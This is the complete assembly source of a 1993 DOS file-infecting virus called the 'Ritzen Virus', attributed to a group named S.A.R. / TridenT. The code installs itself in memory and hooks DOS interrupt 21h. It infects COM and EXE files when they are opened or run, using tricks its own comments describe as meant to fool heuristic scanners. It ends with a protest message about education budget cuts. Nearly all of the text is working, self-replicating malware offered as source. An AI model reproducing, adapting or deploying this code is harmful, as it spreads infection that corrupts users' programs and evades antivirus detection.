;***************************************************************************** ;* * ;* The Ritzen Virus * ;* * ;* (c) '93, by S.A.R. (Students Agains Ritzen) / TridenT * ;* * ;***************************************************************************** .model tiny .radix 16 .code len equ offset last - atlantic len_para equ len /10h mem_size equ 60h org 100h dummy: db 0e9h,00h,00h ; dummy file, ; contains jump to ; virus code. atlantic: call get_ip sub bp,offset atlantic+3 rest_host: push ds pop ax mov cs:[segm+bp],ax cmp cs:[type_host+bp],'E' ; check if host je fix_exe ; is COM or EXE. fix_com: lea si,cs:[com_start+bp] ; fix start of mov ax,es inc ax mov es,ax mov di,00F0h ; com host with mov cx,03h ; original data. rep movsb mov ax,es dec ax mov es,ax mov ax,0100h ; IP start at 0100h. push cs ; store segment+IP push ax ; on stack. jmp chk_resident fix_exe: mov ax,cs:[exe_cs+bp] ; CS and IP on stack mov bx,ax mov ax,ds add ax,bx add ax,10h push ax mov bx,cs:[exe_ip+bp] push bx chk_resident: mov dx,0aaaah mov ax,3000h int 21h cmp dx,0bbbbh je end_install mem_install: push ds ; let DS points push ds pop ax ; to MCB dec ax ; 2 times to fool dec ax ; heuristic scanners push ax pop ds cmp byte ptr ds:[0010],5ah ; last MCB? jne abort_install ; if no, quit. mov ax,ds:[0013] ; adjust memory sub ax,mem_size ; size. mov ds:[0013],ax ; store size in MCB. pop ds ; restore original ; DS segment. sub word ptr ds:[0002],mem_size ; don't forget to ; adjust memory ; size stored in ; PSP to. vir_install: xchg ax,bx ; install virus mov ax,es add ax,bx ; AX = virussegment mov es,ax mov cs:[vir_seg+bp],ax push cs pop ds lea si,[atlantic+bp] ; copy virus to lea di,es:0103h ; memory mov cx,len copy: movsb dec cx jnz copy push ds pop es hook_i21h: cli mov ax,3521h int 21h mov ds,cs:[vir_seg+bp] mov [i21h],bx mov [i21h+2],es ; mov dx, offset ds:[mine_i21h] ; mov ax,2521h ; int 21h mov ax,ds mov bx,ax mov dx, offset ds:[mine_i21h] xor ax,ax mov ds,ax mov ds:[4*21h],dx mov ds:[4*21h+2],bx sti abort_install: mov ax,cs:[segm+bp] push ax pop es push es pop ds end_install: retf ;************************************************************************* ;* * ;* I N T E R U P T H A N D L E R * ;* * ;************************************************************************* mine_i24h: mov al,03h iret mine_i21h: pushf ; check for cmp ax,3000h ; virus ID jne new_21h cmp dx,0aaaah jne new_21h mov dx,0bbbbh ; return ID popf iret new_21h: push ax ; save registers push bx push cx push dx push ds push es push di push si chk_open: xchg ax,bx cmp bh,3dh ; open file? je chk_com chk_exec: cmp bx,04b00h ; execute file? je chk_com continu: pop si ; restore registers pop di pop es pop ds pop dx pop cx pop bx pop ax next: popf ; call original jmp dword ptr cs:[i21h] ; interupt ;************************************************************************** ;* * ;* C H E C K C O M / E X E F I L E * ;* * ;************************************************************************** chk_com: mov cs:[name_seg],ds mov cs:[name_off],dx cld mov cx,0ffh push ds pop es push dx pop di mov al,'.' repne scasb cmp word ptr es:[di],'OC' jne chk_exe cmp word ptr es:[di+2],'M' jne continu jmp infect_com chk_exe: cmp word ptr es:[di],'XE' jne continu cmp word ptr es:[di+2],'E' jne continu jmp infect_exe ;************************************************************************** ;* * ;* I N F E C T C O M - F I L E * ;* * ;************************************************************************** infect_com: call init cmp cs:[fout],0ffh je close_file mov cs:[type_host],'C' mov ax,4200h ; go to start of file call mov_point mov cx,03h mov ah,3fh lea dx,cs:[com_start] call do_int21h mov ax,4200h call mov_point mov ax,4202h call mov_point sub ax,03h mov cs:[lenght_file],ax call write_jmp call write_vir call save_date close_file: mov bx,cs:[handle] mov ah,3eh call do_int21h restore_int24h: mov dx,cs:[i24h] mov ds,cs:[i24h+2] mov ax,2524h call do_int21h jmp continu ;************************************************************************** ;* * ;* I N F E C T E X E - F I L E * ;* * ;************************************************************************** infect_exe: call init cmp cs:[fout],0ffh je close_file mov cs:[type_host],'E' mov ax,4200h call mov_point mov ah,3fh mov cx,18h lea dx,[head_exe] call do_int21h call inf_exe call save_date jmp close_file ;************************************************************************** ;* * ;* R O U T I N E S * ;* * ;************************************************************************** get_ip: push sp ; get ip from stack pop bx mov ax, word ptr cs:[bx] mov bp,ax ret init: mov cs:[fout],00h call int24h call open_file jc error call set_atributes call get_date call chk_infect je error ret error: mov cs:[fout],0ffh ret int24h: push cs pop ds mov ax,3524h call do_int21h mov cs:[i24h],bx mov cs:[i24h+2],es mov dx, offset mine_i24h mov ax,2524h call do_int21h ret mov_point: push cs pop ds mov bx,cs:[handle] xor cx,cx xor dx,dx call do_int21h ret open_file: mov ds,cs:[name_seg] mov dx,cs:[name_off] mov ax,3d02h call do_int21h mov cs:[handle],ax mov bx,ax ret set_atributes: mov ax,4200h mov ds,cs:[name_seg] mov dx,cs:[name_off] call do_int21h and cl,0feh mov ax,4301h call do_int21h ret get_date: mov bx,cs:[handle] mov ax,5700h call do_int21h mov cs:[date],dx mov cs:[time],cx ret chk_infect: push cs pop ds mov ax,4202h xor cx,cx sub cx,01h xor dx,dx sub dx,02h mov bx,cs:[handle] call do_int21h mov ah,3fh mov cx,02h lea dx,cs:[file_id] call do_int21h mov al, byte ptr cs:[file_id] mov ah, byte ptr cs:[file_id]+1 cmp ax,[virus_id] ret write_jmp: push cs pop ds mov ax,4200h call mov_point mov ah,40h mov cx,01h lea dx,cs:[jump] call do_int21h mov ah,40h mov cx,02h lea dx,cs:[lenght_file] call do_int21h ret write_vir: push cs pop ds mov ax,4202h call mov_point mov ah,40h mov cx,len mov dx,103h call do_int21h ret save_date: mov ax,5700h call do_int21h mov cs:[date],dx mov cs:[time],cx ret inf_exe: mov ax,word ptr cs:[head_exe+14h] mov cs:[exe_ip],ax mov ax, word ptr cs:[head_exe+16h] mov cs:[exe_cs],ax mov ax,4200h call mov_point mov ax,4202h call mov_point mov bx,10h div bx sub ax, word ptr cs:[head_exe+08h] mov cs:[new_cs],ax mov cs:[new_ip],dx call write_vir mov ax,4200h call mov_point mov ax,4202h call mov_point mov bx,0200h div bx cmp dx,0000h jne not_zero jmp zero not_zero: inc ax zero: mov word ptr cs:[head_exe+02h],dx mov word ptr cs:[head_exe+04h],ax mov ax,cs:[new_ip] mov word ptr cs:[head_exe+14h],ax mov ax,cs:[new_cs] mov word ptr cs:[head_exe+16h],ax mov word ptr cs:[head_exe+0Eh],ax add word ptr cs:[head_exe+10],len_para ; mov word ptr cs:[head_exe+10],1000 mov ax,4200h call mov_point mov ah,40h mov bx,cs:[handle] mov cx,18h lea dx,cs:[head_exe] call do_int21h ret do_int21h: pushf call dword ptr cs:[i21h] ret ;**************************************************************************** ;* * ;* D A T A * ;* * ;**************************************************************************** type_host db 'C' com_start db 0cdh,20h,90h message db " Dedicated to Ritzen, our Minister of Education and Science." db " We are getting sick of your budget cuts so we hope that" db " you get sick of this virus.." db " (c) '93 by S.A.R. / TridenT ." exe_cs dw ? exe_ip dw ? new_cs dw ? new_ip dw ? vir_seg dw ? i21h dw 00h,00h i24h dw 00h,00h name_seg dw ? name_off dw ? lenght_file dw ? head_exe db 18 dup (?) handle dw ? fout db ? file_id dw ? jump db 0e9h date dw ? time dw ? segm dw ? virus_id dw "AP" last dw "AP" end dummy